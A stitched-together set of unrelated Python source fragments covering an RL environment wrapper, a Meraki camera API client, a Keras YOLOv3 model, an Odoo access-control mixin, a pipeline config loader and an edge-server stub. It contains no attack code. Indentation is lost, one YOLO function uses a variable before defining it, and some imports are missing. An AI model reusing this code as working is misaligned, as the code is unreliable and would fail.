turn = 0
else:
movement = action // 18
cam_rot = (action // 6) % 3
jump = (action // 3) % 2
turn = action % 3
return np.array([movement, cam_rot, jump, turn])
@staticmethod
def mda_to_discrete(mda):
return mda[0] * 18 + mda[1] * 6 + mda[2] * 3 + mda[3]
def render(self):
render_img = cv2.resize(self.wrapped_env.render(), (0, 0), fx=4.0, fy=4.0)
display.clear_output(wait=True)
display.display(Image.fromarray(render_img))
time.sleep(1 / 60)
def step(self, action, simple_action=False, render=False):
frame_buffer = torch.zeros(2, 84, 84, device=self.device)
if simple_action:
action = self.mda_to_discrete(self.action_to_mda(action))
return self._step(action, frame_buffer, render)
def _process_observation(self, observation):
observation = observation.squeeze()
observation = torch.tensor(observation, dtype=torch.float32, device=self.device).div_(255)
return observation
|
class AsyncCameraQualityRetentionProfiles:
def __init__(self, session):
super().__init__()
self._session = session
async def getNetworkCameraQualityRetentionProfiles(self, networkId: str):
"""
**List the quality retention profiles for this network**
https://developer.cisco.com/docs/meraki-api-v0/#!get-network-camera-quality-retention-profiles
- networkId (string)
"""
metadata = {
'tags': ['Camera quality retention profiles'],
'operation': 'getNetworkCameraQualityRetentionProfiles',
}
resource = f'/networks/{networkId}/camera/qualityRetentionProfiles'
return await self._session.get(metadata, resource)
async def createNetworkCameraQualityRetentionProfile(self, networkId: str, name: str, **kwargs):
"""
**Creates new quality retention profile for this network.**
https://developer.cisco.com/docs/meraki-api-v0/#!create-network-camera-quality-retention-profile
- networkId (string)
- name (string): The name of the new profile. Must be unique. This parameter is required.
- motionBasedRetentionEnabled (boolean): Deletes footage older than 3 days in which no motion was detected. Can be either true or false. Defaults to false.
- restrictedBandwidthModeEnabled (boolean): Disable features that require additional bandwidth such as Motion Recap. Can be either true or false. Defaults to false.
- audioRecordingEnabled (boolean): Whether or not to record audio. Can be either true or false. Defaults to false.
- cloudArchiveEnabled (boolean): Create redundant video backup using Cloud Archive. Can be either true or false. Defaults to false.
- motionDetectorVersion (integer): The version of the motion detector that will be used by the camera. Only applies to Gen 2 cameras. Defaults to v2.
- scheduleId (string): Schedule for which this camera will record video, or 'null' to always record.
- maxRetentionDays (integer): The maximum number of days for which the data will be stored, or 'null' to keep data until storage space runs out. If the former, it can be one of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 14, 30, 60, 90] days
- videoSettings (object): Video quality and resolution settings for all the camera models.
"""
kwargs.update(locals())
metadata = {
'tags': ['Camera quality retention profiles'],
'operation': 'createNetworkCameraQualityRetentionProfile',
}
resource = f'/networks/{networkId}/camera/qualityRetentionProfiles'
body_params = ['name', 'motionBasedRetentionEnabled', 'restrictedBandwidthModeEnabled', 'audioRecordingEnabled', 'cloudArchiveEnabled', 'motionDetectorVersion', 'scheduleId', 'maxRetentionDays', 'videoSettings']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return await self._session.post(metadata, resource, payload)
async def getNetworkCameraQualityRetentionProfile(self, networkId: str, qualityRetentionProfileId: str):
"""
**Retrieve a single quality retention profile**
https://developer.cisco.com/docs/meraki-api-v0/#!get-network-camera-quality-retention-profile
- networkId (string)
- qualityRetentionProfileId (string)
"""
metadata = {
'tags': ['Camera quality retention profiles'],
'operation': 'getNetworkCameraQualityRetentionProfile',
}
resource = f'/networks/{networkId}/camera/qualityRetentionProfiles/{qualityRetentionProfileId}'
return await self._session.get(metadata, resource)
async def updateNetworkCameraQualityRetentionProfile(self, networkId: str, qualityRetentionProfileId: str, **kwargs):
"""
**Update an existing quality retention profile for this network.**
https://developer.cisco.com/docs/meraki-api-v0/#!update-network-camera-quality-retention-profile
- networkId (string)
- qualityRetentionProfileId (string)
- name (string): The name of the new profile. Must be unique.
- motionBasedRetentionEnabled (boolean): Deletes footage older than 3 days in which no motion was detected. Can be either true or false. Defaults to false.
- restrictedBandwidthModeEnabled (boolean): Disable features that require additional bandwidth such as Motion Recap. Can be either true or false. Defaults to false.
- audioRecordingEnabled (boolean): Whether or not to record audio. Can be either true or false. Defaults to false.
- cloudArchiveEnabled (boolean): Create redundant video backup using Cloud Archive. Can be either true or false. Defaults to false.
- motionDetectorVersion (integer): The version of the motion detector that will be used by the camera. Only applies to Gen 2 cameras. Defaults to v2.
- scheduleId (string): Schedule for which this camera will record video, or 'null' to always record.
- maxRetentionDays (integer): The maximum number of days for which the data will be stored, or 'null' to keep data until storage space runs out. If the former, it can be one of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 14, 30, 60, 90] days
- videoSettings (object): Video quality and resolution settings for all the camera models.
"""
kwargs.update(locals())
metadata = {
'tags': ['Camera quality retention profiles'],
'operation': 'updateNetworkCameraQualityRetentionProfile',
}
resource = f'/networks/{networkId}/camera/qualityRetentionProfiles/{qualityRetentionProfileId}'
body_params = ['name', 'motionBasedRetentionEnabled', 'restrictedBandwidthModeEnabled', 'audioRecordingEnabled', 'cloudArchiveEnabled', 'motionDetectorVersion', 'scheduleId', 'maxRetentionDays', 'videoSettings']
payload = {k: v for (k, v) in kwargs.items() if k in body_params}
return await self._session.put(metadata, resource, payload)
async def deleteNetworkCameraQualityRetentionProfile(self, networkId: str, qualityRetentionProfileId: str):
"""
**Delete an existing quality retention profile for this network.**
https://developer.cisco.com/docs/meraki-api-v0/#!delete-network-camera-quality-retention-profile
- networkId (string)
- qualityRetentionProfileId (string)
"""
metadata = {
'tags': ['Camera quality retention profiles'],
'operation': 'deleteNetworkCameraQualityRetentionProfile',
}
resource = f'/networks/{networkId}/camera/qualityRetentionProfiles/{qualityRetentionProfileId}'
return await self._session.delete(metadata, resource)
|
<reponame>rootadminWalker/keras-YOLOv3-model-set
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v3 Darknet Model Defined in Keras."""
from tensorflow.keras.layers import Conv2D, Add, ZeroPadding2D, UpSampling2D, Concatenate, MaxPooling2D, GlobalAveragePooling2D, Flatten, Softmax, Reshape, Input
from tensorflow.keras.models import Model
from tensorflow.keras import backend as K
from keras_applications.imagenet_utils import _obtain_input_shape
from .layers import compose, DarknetConv2D, DarknetConv2D_BN_Leaky, Depthwise_Separable_Conv2D_BN_Leaky, Darknet_Depthwise_Separable_Conv2D_BN_Leaky
#from yolo3.models.layers import make_last_layers, make_depthwise_separable_last_layers, make_spp_last_layers
from .layers import yolo3_predictions, yolo3lite_predictions, tiny_yolo3_predictions, tiny_yolo3lite_predictions
def resblock_body(x, num_filters, num_blocks):
'''A series of resblocks starting with a downsampling Convolution2D'''
# Darknet uses left and top padding instead of 'same' mode
x = ZeroPadding2D(((1,0),(1,0)))(x)
x = DarknetConv2D_BN_Leaky(num_filters, (3,3), strides=(2,2))(x)
for i in range(num_blocks):
y = compose(
DarknetConv2D_BN_Leaky(num_filters//2, (1,1)),
DarknetConv2D_BN_Leaky(num_filters, (3,3)))(x)
x = Add()([x,y])
return x
def darknet53_body(x):
'''Darknet53 body having 52 Convolution2D layers'''
x = DarknetConv2D_BN_Leaky(32, (3,3))(x)
x = resblock_body(x, 64, 1)
x = resblock_body(x, 128, 2)
x = resblock_body(x, 256, 8)
x = resblock_body(x, 512, 8)
x = resblock_body(x, 1024, 4)
return x
def depthwise_separable_resblock_body(x, num_filters, num_blocks):
'''A series of resblocks starting with a downsampling Convolution2D'''
# Darknet uses left and top padding instead of 'same' mode
x = ZeroPadding2D(((1,0),(1,0)))(x)
x = Darknet_Depthwise_Separable_Conv2D_BN_Leaky(num_filters, (3,3), strides=(2,2))(x)
for i in range(num_blocks):
y = compose(
DarknetConv2D_BN_Leaky(num_filters//2, (1,1)),
Darknet_Depthwise_Separable_Conv2D_BN_Leaky(num_filters, (3,3)))(x)
x = Add()([x,y])
return x
def darknet53lite_body(x):
'''Darknet body having 52 Convolution2D layers'''
x = Darknet_Depthwise_Separable_Conv2D_BN_Leaky(32, (3,3))(x)
x = depthwise_separable_resblock_body(x, 64, 1)
x = depthwise_separable_resblock_body(x, 128, 2)
x = depthwise_separable_resblock_body(x, 256, 8)
x = depthwise_separable_resblock_body(x, 512, 8)
x = depthwise_separable_resblock_body(x, 1024, 4)
return x
def yolo3_body(inputs, num_anchors, num_classes, weights_path=None):
"""Create YOLO_V3 model CNN body in Keras."""
darknet = Model(inputs, darknet53_body(inputs))
if weights_path is not None:
darknet.load_weights(weights_path, by_name=True)
print('Load weights {}.'.format(weights_path))
# f1: 13 x 13 x 1024
f1 = darknet.output
# f2: 26 x 26 x 512
f2 = darknet.layers[152].output
# f3: 52 x 52 x 256
f3 = darknet.layers[92].output
f1_channel_num = 1024
f2_channel_num = 512
f3_channel_num = 256
y1, y2, y3 = yolo3_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs, [y1,y2,y3])
#def custom_yolo3_body(inputs, num_anchors, num_classes, weights_path):
#'''Create a custom YOLO_v3 model, use
#pre-trained weights from darknet and fit
#for our target classes.'''
##TODO: get darknet class number from class file
#num_classes_coco = 80
#base_model = yolo3_body(inputs, num_anchors, num_classes_coco)
#base_model.load_weights(weights_path, by_name=True)
#print('Load weights {}.'.format(weights_path))
##base_model.summary()
##from tensorflow.keras.utils import plot_model as plot
##plot(base_model, to_file='model.png', show_shapes=True)
##get conv output in original network
#y1 = base_model.get_layer('leaky_re_lu_57').output
#y2 = base_model.get_layer('leaky_re_lu_64').output
#y3 = base_model.get_layer('leaky_re_lu_71').output
#y1 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1')(y1)
#y2 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2')(y2)
#y3 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_3')(y3)
#return Model(inputs, [y1,y2,y3])
def yolo3_spp_body(inputs, num_anchors, num_classes, weights_path=None):
"""Create YOLO_V3 SPP model CNN body in Keras."""
darknet = Model(inputs, darknet53_body(inputs))
if weights_path is not None:
darknet.load_weights(weights_path, by_name=True)
print('Load weights {}.'.format(weights_path))
# f1: 13 x 13 x 1024
f1 = darknet.output
# f2: 26 x 26 x 512
f2 = darknet.layers[152].output
# f3: 52 x 52 x 256
f3 = darknet.layers[92].output
f1_channel_num = 1024
f2_channel_num = 512
f3_channel_num = 256
y1, y2, y3 = yolo3_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes, use_spp=True)
return Model(inputs, [y1,y2,y3])
def custom_yolo3_spp_body(inputs, num_anchors, num_classes, weights_path):
'''Create a custom YOLO_v3 SPP model, use
pre-trained weights from darknet and fit
for our target classes.'''
#TODO: get darknet class number from class file
num_classes_coco = 80
base_model = yolo3_spp_body(inputs, num_anchors, num_classes_coco)
base_model.load_weights(weights_path, by_name=False)
print('Load weights {}.'.format(weights_path))
# reform the predict conv layer for custom dataset classes
#y1 = base_model.get_layer('leaky_re_lu_58').output
#y2 = base_model.get_layer('leaky_re_lu_65').output
#y3 = base_model.get_layer('leaky_re_lu_72').output
y1 = base_model.layers[-6].output
y2 = base_model.layers[-5].output
y3 = base_model.layers[-4].output
y1 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1')(y1)
y2 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2')(y2)
y3 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_3')(y3)
return Model(inputs, [y1,y2,y3])
def yolo3lite_body(inputs, num_anchors, num_classes):
"""Create YOLO_V3 Lite model CNN body in Keras."""
darknetlite = Model(inputs, darknet53lite_body(inputs))
# f1: 13 x 13 x 1024
f1 = darknetlite.output
# f2: 26 x 26 x 512
f2 = darknetlite.layers[152].output
# f3: 52 x 52 x 256
f3 = darknetlite.layers[92].output
f1_channel_num = 1024
f2_channel_num = 512
f3_channel_num = 256
y1, y2, y3 = yolo3lite_predictions((f1, f2, f3), (f1_channel_num, f2_channel_num, f3_channel_num), num_anchors, num_classes)
return Model(inputs, [y1,y2,y3])
def tiny_yolo3_body(inputs, num_anchors, num_classes):
'''Create Tiny YOLO_v3 model CNN body in keras.'''
#feature map 2 (26x26x256 for 416 input)
f2 = compose(
DarknetConv2D_BN_Leaky(16, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(32, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(64, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(128, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(256, (3,3)))(inputs)
#feature map 1 (13x13x1024 for 416 input)
f1 = compose(
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
DarknetConv2D_BN_Leaky(512, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(1,1), padding='same'),
DarknetConv2D_BN_Leaky(1024, (3,3)))(f2)
#feature map 1 transform
x1 = DarknetConv2D_BN_Leaky(256, (1,1))(f1)
#feature map 1 output (13x13 for 416 input)
y1 = compose(
DarknetConv2D_BN_Leaky(512, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1'))(x1)
#upsample fpn merge for feature map 1 & 2
x2 = compose(
DarknetConv2D_BN_Leaky(128, (1,1)),
UpSampling2D(2))(x1)
#feature map 2 output (26x26 for 416 input)
y2 = compose(
Concatenate(),
DarknetConv2D_BN_Leaky(256, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2'))([x2, f2])
return Model(inputs, [y1,y2])
def custom_tiny_yolo3_body(inputs, num_anchors, num_classes, weights_path):
'''Create a custom Tiny YOLO_v3 model, use
pre-trained weights from darknet and fit
for our target classes.'''
#TODO: get darknet class number from class file
num_classes_coco = 80
base_model = tiny_yolo3_body(inputs, num_anchors, num_classes_coco)
base_model.load_weights(weights_path, by_name=False)
print('Load weights {}.'.format(weights_path))
#get conv output in original network
#y1 = base_model.get_layer('leaky_re_lu_8').output
#y2 = base_model.get_layer('leaky_re_lu_10').output
y1 = base_model.layers[40].output
y2 = base_model.layers[41].output
y1 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1')(y1)
y2 = DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2')(y2)
return Model(inputs, [y1,y2])
def tiny_yolo3lite_body(inputs, num_anchors, num_classes):
'''Create Tiny YOLO_v3 Lite model CNN body in keras.'''
#feature map 2 (26x26x256 for 416 input)
f2 = compose(
Depthwise_Separable_Conv2D_BN_Leaky(16, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
Depthwise_Separable_Conv2D_BN_Leaky(32, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
Depthwise_Separable_Conv2D_BN_Leaky(64, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
Depthwise_Separable_Conv2D_BN_Leaky(128, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
Depthwise_Separable_Conv2D_BN_Leaky(256, (3,3)))(inputs)
#feature map 1 (13x13x1024 for 416 input)
f1 = compose(
MaxPooling2D(pool_size=(2,2), strides=(2,2), padding='same'),
Depthwise_Separable_Conv2D_BN_Leaky(512, (3,3)),
MaxPooling2D(pool_size=(2,2), strides=(1,1), padding='same'),
Depthwise_Separable_Conv2D_BN_Leaky(1024, (3,3)))(f2)
#feature map 1 transform
x1 = DarknetConv2D_BN_Leaky(256, (1,1))(f1)
#feature map 1 output (13x13 for 416 input)
y1 = compose(
Depthwise_Separable_Conv2D_BN_Leaky(512, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_1'))(x2)
#upsample fpn merge for feature map 1 & 2
x2 = compose(
DarknetConv2D_BN_Leaky(128, (1,1)),
UpSampling2D(2))(x1)
#feature map 2 output (26x26 for 416 input)
y2 = compose(
Concatenate(),
Depthwise_Separable_Conv2D_BN_Leaky(256, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv_2'))([x2, f2])
return Model(inputs, [y1,y2])
BASE_WEIGHT_PATH = (
'https://github.com/david8862/keras-YOLOv3-model-set/'
'releases/download/v1.0.1/')
def DarkNet53(input_shape=None,
input_tensor=None,
include_top=True,
weights='imagenet',
pooling=None,
classes=1000,
**kwargs):
"""Generate darknet53 model for Imagenet classification."""
if not (weights in {'imagenet', None} or os.path.exists(weights)):
raise ValueError('The `weights` argument should be either '
'`None` (random initialization), `imagenet` '
'(pre-training on ImageNet), '
'or the path to the weights file to be loaded.')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as `"imagenet"` with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
input_shape = _obtain_input_shape(input_shape,
default_size=224,
min_size=28,
data_format=K.image_data_format(),
require_flatten=include_top,
weights=weights)
if input_tensor is None:
img_input = Input(shape=input_shape)
else:
img_input = input_tensor
x = darknet53_body(img_input)
if include_top:
model_name='darknet53'
x = GlobalAveragePooling2D(name='avg_pool')(x)
x = Reshape((1, 1, 1024))(x)
x = DarknetConv2D(classes, (1, 1))(x)
x = Flatten()(x)
x = Softmax(name='Predictions/Softmax')(x)
else:
model_name='darknet53_headless'
if pooling == 'avg':
x = GlobalAveragePooling2D(name='avg_pool')(x)
elif pooling == 'max':
x = GlobalMaxPooling2D(name='max_pool')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
model = Model(inputs, x, name=model_name)
# Load weights.
if weights == 'imagenet':
if include_top:
file_name = 'darknet53_weights_tf_dim_ordering_tf_kernels_224.h5'
weight_path = BASE_WEIGHT_PATH + file_name
else:
file_name = 'darknet53_weights_tf_dim_ordering_tf_kernels_224_no_top.h5'
weight_path = BASE_WEIGHT_PATH + file_name
weights_path = get_file(file_name, weight_path, cache_subdir='models')
model.load_weights(weights_path)
elif weights is not None:
model.load_weights(weights)
return model
|
###################################################################################
#
# Copyright (C) 2017 MuK IT GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###################################################################################
import logging
from odoo import _, SUPERUSER_ID
from odoo import models, api, fields
from odoo.exceptions import AccessError
from odoo.addons.muk_security.tools import helper
_logger = logging.getLogger(__name__)
class BaseModelAccessGroups(models.AbstractModel):
_name = 'muk_security.access_groups'
_description = "MuK Access Groups Model"
_inherit = 'muk_security.access'
# Set it to True to enforced security even if no group has been set
_strict_security = False
# If set the group fields are restricted by the access group
_field_groups = None
# If set the suspend fields are restricted by the access group
_suspend_groups = None
#----------------------------------------------------------
# Datebase
#----------------------------------------------------------
@api.model
def _add_magic_fields(self):
super(BaseModelAccessGroups, self)._add_magic_fields()
def add(name, field):
if name not in self._fields:
self._add_field(name, field)
base, model = self._name.split(".")
add('suspend_security_read', fields.Boolean(
_module=base,
string="Suspend Security for Read",
automatic=True,
default=False,
groups=self._suspend_groups))
add('suspend_security_create', fields.Boolean(
_module=base,
string="Suspend Security for Create",
automatic=True,
default=False,
groups=self._suspend_groups))
add('suspend_security_write', fields.Boolean(
_module=base,
string="Suspend Security for Write",
automatic=True,
default=False,
groups=self._suspend_groups))
add('suspend_security_unlink', fields.Boolean(
_module=base,
string="Suspend Security for Unlink",
automatic=True,
default=False,
groups=self._suspend_groups))
add('groups', fields.Many2many(
_module=base,
comodel_name='muk_security.groups',
relation='muk_groups_%s_rel' % model,
column1='aid',
column2='gid',
string="Groups",
automatic=True,
groups=self._field_groups))
add('complete_groups', fields.Many2many(
_module=base,
comodel_name='muk_security.groups',
relation='muk_groups_complete_%s_rel' % model,
column1='aid',
column2='gid',
string="Complete Groups",
compute='_compute_groups',
store=True,
automatic=True,
groups=self._field_groups))
#----------------------------------------------------------
# Function
#----------------------------------------------------------
@api.multi
def trigger_computation(self, fields, *largs, **kwargs):
super(BaseModelAccessGroups, self).trigger_computation(fields, *largs, **kwargs)
if "complete_groups" in fields:
self.suspend_security()._compute_groups()
@api.model
def check_group_values(self, values):
if any(field in values for field in ['groups']):
return True
return False
@api.multi
@api.returns('muk_security.groups')
def get_groups(self):
self.ensure_one()
groups = self.env['muk_security.groups']
groups |= self.groups
return groups
@api.model
def _get_no_access_ids(self, operation):
base, model = self._name.split(".")
if not self._strict_security:
sql = '''
SELECT id
FROM %s a
WHERE NOT EXISTS (
SELECT *
FROM muk_groups_complete_%s_rel r
JOIN muk_security_groups g ON r.gid = g.id
WHERE r.aid = a.id AND g.perm_%s = true
);
''' % (self._table, model, operation)
self.env.cr.execute(sql)
fetch = self.env.cr.fetchall()
return len(fetch) > 0 and list(map(lambda x: x[0], fetch)) or []
else:
return []
@api.model
def _get_suspended_access_ids(self, operation):
base, model = self._name.split(".")
sql = '''
SELECT id
FROM %s a
WHERE a.suspend_security_%s = true
''' % (self._table, operation)
self.env.cr.execute(sql)
fetch = self.env.cr.fetchall()
return len(fetch) > 0 and list(map(lambda x: x[0], fetch)) or []
@api.model
def _get_access_ids(self):
base, model = self._name.split(".")
sql = '''
SELECT r.aid
FROM muk_groups_complete_%s_rel r
JOIN muk_security_groups g ON r.gid = g.id
JOIN muk_security_groups_users_rel u ON r.gid = u.gid
WHERE u.uid = %s AND g.perm_read = true
''' % (model, self.env.user.id)
self.env.cr.execute(sql)
fetch = self.env.cr.fetchall()
access_ids = len(fetch) > 0 and list(map(lambda x: x[0], fetch)) or []
return access_ids
@api.model
def _get_ids_without_security(self, operation):
no_access_ids = self._get_no_access_ids(operation)
suspended_access_ids = self._get_suspended_access_ids(operation)
return list(set(no_access_ids).union(suspended_access_ids))
@api.model
def _get_complete_access_ids(self, operation):
access_ids = self._get_access_ids()
no_access_ids = self._get_no_access_ids(operation)
suspended_access_ids = self._get_suspended_access_ids(operation)
return list(set(access_ids).union(no_access_ids, suspended_access_ids))
@api.multi
def _eval_access_skip(self, operation):
if isinstance(self.env.uid, helper.NoSecurityUid):
return True
return False
@api.multi
def check_access_groups(self, operation):
if self.env.user.id == SUPERUSER_ID or self._eval_access_skip(operation):
return None
base, model = self._name.split(".")
filter_ids = self._get_ids_without_security(operation)
for record in self.filtered(lambda rec: rec.id not in filter_ids):
sql = '''
SELECT perm_%s
FROM muk_groups_complete_%s_rel r
JOIN muk_security_groups g ON g.id = r.gid
JOIN muk_security_groups_users_rel u ON u.gid = g.id
WHERE r.aid = %s AND u.uid = %s
''' % (operation, model, record.id, self.env.user.id)
self.env.cr.execute(sql)
fetch = self.env.cr.fetchall()
if not any(list(map(lambda x: x[0], fetch))):
raise AccessError(_("This operation is forbidden!"))
@api.multi
def check_access(self, operation, raise_exception=False):
res = super(BaseModelAccessGroups, self).check_access(operation, raise_exception)
try:
access_groups = self.check_access_groups(operation) == None
access = res and access_groups
if not access and raise_exception:
raise AccessError(_("This operation is forbidden!"))
return access
except AccessError:
if raise_exception:
raise AccessError(_("This operation is forbidden!"))
return False
#----------------------------------------------------------
# Read
#----------------------------------------------------------
@api.multi
def _after_read(self, result, *largs, **kwargs):
result = super(BaseModelAccessGroups, self)._after_read(result)
if self.env.user.id == SUPERUSER_ID or self._eval_access_skip("read"):
return result
access_ids = self._get_complete_access_ids("read")
result = [result] if not isinstance(result, list) else result
if len(access_ids) > 0:
access_result = []
for record in result:
if record['id'] in access_ids:
access_result.append(record)
return access_result
return []
@api.model
def _after_search(self, result, *largs, **kwargs):
result = super(BaseModelAccessGroups, self)._after_search(result)
if self.env.user.id == SUPERUSER_ID or self._eval_access_skip("read"):
return result
access_ids = self._get_complete_access_ids("read")
if len(access_ids) > 0:
access_result = self.env[self._name]
if isinstance(result, int):
if result in access_ids:
return result
else:
for record in result:
if record.id in access_ids:
access_result += record
return access_result
return self.env[self._name]
@api.model
def _after_name_search(self, result, *largs, **kwargs):
result = super(BaseModelAccessGroups, self)._after_name_search(result)
if self.env.user.id == SUPERUSER_ID or self._eval_access_skip("read"):
return result
access_ids = self._get_complete_access_ids("read")
if len(access_ids) > 0:
access_result = []
for tuple in result:
if tuple[0] in access_ids:
access_result.append(tuple)
return access_result
return []
#----------------------------------------------------------
# Read, View
#----------------------------------------------------------
@api.multi
def _compute_groups(self, write=True):
if write:
for record in self:
record.complete_groups = record.get_groups()
else:
self.ensure_one()
return {'complete_groups': [(6, 0, self.get_groups().mapped('id'))]}
#----------------------------------------------------------
# Create, Update, Delete
#----------------------------------------------------------
@api.multi
def _before_write(self, vals, *largs, **kwargs):
self.check_access_groups('write')
return super(BaseModelAccessGroups, self)._before_write(vals, *largs, **kwargs)
@api.multi
def _before_unlink(self, *largs, **kwargs):
self.check_access_groups('unlink')
return super(BaseModelAccessGroups, self)._before_unlink(*largs, **kwargs)
@api.multi
def _check_recomputation(self, vals, olds, *largs, **kwargs):
super(BaseModelAccessGroups, self)._check_recomputation(vals, olds, *largs, **kwargs)
fields = []
if self.check_group_values(vals):
fields.extend(['complete_groups'])
if fields:
self.trigger_computation(fields)
|
<gh_stars>0
import json
import os
from agent import source
from agent.modules.logger import get_logger
from agent.modules.constants import ROOT_DIR
from agent.pipeline import Pipeline
logger = get_logger(__name__)
class BaseConfigLoader:
BASE_PIPELINE_CONFIGS_PATH = 'base_pipelines'
@classmethod
def load_base_config(cls, pipeline: Pipeline) -> dict:
with open(cls._get_config_path(pipeline)) as f:
data = json.load(f)
return data['pipelineConfig']
@classmethod
def _get_config_path(cls, pipeline: Pipeline):
return os.path.join(ROOT_DIR, 'pipeline', 'config', cls.BASE_PIPELINE_CONFIGS_PATH,
cls._get_config_file(pipeline))
@classmethod
def _get_config_file(cls, pipeline: Pipeline) -> str:
name = {
source.TYPE_CACTI: 'cacti',
source.TYPE_CLICKHOUSE: 'jdbc_http',
source.TYPE_ELASTIC: 'elastic_http',
source.TYPE_INFLUX: 'influx_http',
source.TYPE_KAFKA: 'kafka_http',
source.TYPE_MONGO: 'mongo_http',
source.TYPE_MYSQL: 'jdbc_http',
source.TYPE_POSTGRES: 'jdbc_http',
source.TYPE_SAGE: 'sage_http',
source.TYPE_SPLUNK: 'tcp_server_http',
source.TYPE_SOLARWINDS: 'solarwinds',
source.TYPE_VICTORIA: 'victoria_http',
source.TYPE_ZABBIX: 'zabbix_http',
}[pipeline.source.type]
return name + '.json'
class SchemaBaseConfigLoader(BaseConfigLoader):
@classmethod
def _get_config_file(cls, pipeline: Pipeline) -> str:
name = {
source.TYPE_CLICKHOUSE: 'jdbc_http',
source.TYPE_DIRECTORY: 'directory_http',
source.TYPE_INFLUX: 'influx',
source.TYPE_KAFKA: 'kafka_http',
source.TYPE_MYSQL: 'jdbc_http',
source.TYPE_POSTGRES: 'jdbc_http',
}[pipeline.source.type]
return name + '_schema.json'
class TestPipelineBaseConfigLoader(BaseConfigLoader):
BASE_PIPELINE_CONFIGS_PATH = 'test_pipelines'
@classmethod
def _get_config_file(cls, pipeline: Pipeline) -> str:
return {
source.TYPE_CLICKHOUSE: 'test_jdbc_pdsf4587',
source.TYPE_DIRECTORY: 'test_directory_ksdjfjk21',
source.TYPE_ELASTIC: 'test_elastic_asdfs3245',
source.TYPE_INFLUX: 'test_influx_qwe093',
source.TYPE_MONGO: 'test_mongo_rand847',
source.TYPE_KAFKA: 'test_kafka_kjeu4334',
source.TYPE_MYSQL: 'test_jdbc_pdsf4587',
source.TYPE_POSTGRES: 'test_jdbc_pdsf4587',
source.TYPE_SAGE: 'test_sage_jfhdkj',
source.TYPE_SPLUNK: 'test_tcp_server_jksrj322',
source.TYPE_SOLARWINDS: 'test_solarwinds_jksrj322',
source.TYPE_ZABBIX: 'test_zabbix_jfhdkj',
}[pipeline.source.type] + '.json'
class BaseConfigHandler:
stages_to_override = {}
def __init__(self, pipeline: Pipeline, base_config: dict):
self.config = base_config
self.pipeline = pipeline
def override_base_config(self):
self._override_pipeline_config()
self._override_stages()
self._set_labels()
return self.config
def _set_labels(self):
self.config['metadata']['labels'] = [self.pipeline.source.type, self.pipeline.destination.TYPE]
def _override_stages(self):
for stage in self.config['stages']:
if stage['instanceName'] in self.stages_to_override:
stage_config = self.stages_to_override[stage['instanceName']](self.pipeline, stage).config
for conf in stage['configuration']:
if conf['name'] in stage_config:
conf['value'] = stage_config[conf['name']]
def _get_pipeline_config(self) -> dict:
return {
'TOKEN': self.pipeline.destination.token,
'PROTOCOL': self.pipeline.destination.PROTOCOL_20,
'ANODOT_BASE_URL': self.pipeline.destination.url,
'AGENT_URL': self.pipeline.streamsets.agent_external_url,
}
def _override_pipeline_config(self):
self.config['title'] = self.pipeline.name
for config in self.config['configuration']:
if config['name'] == 'constants':
config['value'] = [{'key': key, 'value': val} for key, val in self._get_pipeline_config().items()]
|
<gh_stars>10-100
import queue
import sys
import time
import string
import random
import numpy as np
from loguru import logger
from concurrent import futures
import edge_globals
from tools.read_config import read_config
from local.preprocessor import preprocess
from frontend_server.offloading import send_frame
from tools.transfer_files_tool import transfer_array_and_str
from model_manager import object_detection, image_classification
# the video frame handler of the forwarding server
frame_handler = read_config("flask-url", "video_frame_url")
# generate the id for a task
def id_gen(size=6, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
class ThreadPoolExecutorWithQueueSizeLimit(futures.ThreadPoolExecutor):
def __init__(self, maxsize=50, *args, **kwargs):
